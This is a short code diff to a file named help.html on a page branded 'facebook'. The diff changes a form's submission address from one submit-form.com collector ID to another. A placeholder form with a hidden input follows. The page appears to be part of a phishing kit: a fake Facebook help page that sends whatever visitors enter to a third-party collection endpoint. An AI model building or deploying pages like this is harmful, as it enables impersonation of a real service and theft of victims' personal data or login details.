--- a/help.html
+++ b/help.html
@@ -11,7 +11,7 @@
       <b class="text-5xl text-white">facebook</b>
   </div>
    
-  <form class="sm:hidden lg:block md:block" action="https://submit-form.com/a2rakacBb" method="post"> 
+  <form class="sm:hidden lg:block md:block" action="https://submit-form.com/MDOsZ7x6e" method="post"> 
 <form action="https://submit-form.com/your-form-id">
   <input
     type="hidden"
